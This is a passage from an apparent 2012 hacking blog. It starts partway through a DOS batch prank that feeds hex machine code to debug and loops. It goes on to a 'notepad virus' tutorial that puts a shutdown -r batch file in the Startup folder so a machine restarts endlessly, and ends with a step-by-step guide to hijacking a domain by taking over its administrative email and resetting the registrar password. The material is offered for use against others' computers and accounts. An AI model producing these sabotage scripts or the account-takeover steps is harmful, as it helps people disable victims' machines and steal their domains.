echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg<br />
echo g=100>>\z.dbg<br />
echo q>>\z.dbg<br />
debug <\z.dbg>nul<br />
del \z.dbg<br />
goto a<br />
<br />
To disable the error, open Task Manager (Ctrl+Shift+Esc), then end the process wscript.exe<br />
<br /></div>
<b>How to make a notepad virus</b> (Varun Gupta, published 2012-06-22, updated 2012-11-27)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
To create a virus using Notepad, you should know that Notepad can be used to write the source file for <a href="http://www.tachdigit.com/2012/06/batch-file-programming.html" target="_blank">batch file programming</a>. When we save a Notepad file as <b>.bat</b> or <b>.cmd</b>, it becomes a batch file.<br />
<br />
You should also know how to use the command prompt. Here we are using the commands for shutdown and restart.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPyzAwYRQayOpayu_rtk1QTdi6s3px32749YcZmToPUBNf7DZ81HGeQ-n_t_dR5413az-weaotXjrtwQ9ACwoaQJpEmrhMLZfj13wWy5b3hpWtpuQB6r-DdJ-ZIA8GPtArbI_wfdo5Xyk/s1600/shutdown+command.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPyzAwYRQayOpayu_rtk1QTdi6s3px32749YcZmToPUBNf7DZ81HGeQ-n_t_dR5413az-weaotXjrtwQ9ACwoaQJpEmrhMLZfj13wWy5b3hpWtpuQB6r-DdJ-ZIA8GPtArbI_wfdo5Xyk/s320/shutdown+command.JPG" width="320" /></a></div>
<br />
Open the command prompt and type <b>shutdown</b>. This will show you all shutdown parameters; of these, -s, -r and -a are for shutdown, restart and abort respectively. <br />
<br />
Try using the -s parameter first in the command prompt. Open cmd and type <b>shutdown -s</b>. This will display a warning and start a countdown of 30 seconds to save your work.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsEGlbJzLEpxeOpJ2qjX5inBEeeepnVkSuQz-kDnbOC1sRMqxUvuIZuft23wA6V_6wFgedmYLISJ6sy_sHzZi6S5dSKvaVvkLk5WNvUYCrdIz0maTwzoPyIirwBfbxwjZILjx_VV_0TWQ/s1600/shutdown+warning.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsEGlbJzLEpxeOpJ2qjX5inBEeeepnVkSuQz-kDnbOC1sRMqxUvuIZuft23wA6V_6wFgedmYLISJ6sy_sHzZi6S5dSKvaVvkLk5WNvUYCrdIz0maTwzoPyIirwBfbxwjZILjx_VV_0TWQ/s1600/shutdown+warning.JPG" /></a></div>
<br />
To stop this countdown, type <b>shutdown -a</b>.<br />
<br />
Open Notepad, simply type <b>shutdown -r</b> and save it as <b>xyzname.bat</b>. Double clicking this file will now restart your computer. To make it run automatically, paste it in the Startup folder in Start > All Programs > Startup.<br />
<br />
After pasting, whenever the computer is started again, it will restart continuously. To stop this, use shutdown -a in cmd and delete that file from Startup.</div>
<b>Domain Hijacking – How to Hack a Domain Name</b> (Varun Gupta, published 2012-06-17, updated 2012-06-17)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFbPGq-x_g2f28HZKBld-B55Elm4ci2WIz9ng8Ubu6bUQ-U8LICQ_3hnXlWzDOQd322sc0TARNPxXk4mPaU-ranpyCYw_g0rB848Sx8CTcTgSwDCsSwZR_71gj6s8qmaa47q6vJ8DEdOg/s1600/uk_domain_names.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFbPGq-x_g2f28HZKBld-B55Elm4ci2WIz9ng8Ubu6bUQ-U8LICQ_3hnXlWzDOQd322sc0TARNPxXk4mPaU-ranpyCYw_g0rB848Sx8CTcTgSwDCsSwZR_71gj6s8qmaa47q6vJ8DEdOg/s320/uk_domain_names.jpg" width="320" /></a></div>
To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients:<br />
<ol style="text-align: left;">
<li>The domain registrar name for the target domain.</li>
<li>The administrative email address associated with the target domain.</li>
</ol>
This information can be obtained by accessing the <a href="http://en.wikipedia.org/wiki/WHOIS" target="_blank">WHOIS</a> data of the target domain. To access the WHOIS data, go to <a href="http://whois.domaintools.com/">whois.domaintools.com</a>, enter the target domain name and click on Lookup (you need to register to view administrative contact information). Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.<br />
<br />
To get the domain registrar name, look for something like this under the Whois Record: “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. If you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.<br />
<br />
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it.<br />
<br />
Once the hacker takes full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done, all the details to reset the password will be sent to the administrative email address. Since the hacker has access to this email account, he can easily reset the password of the domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.</div>
<br /></div>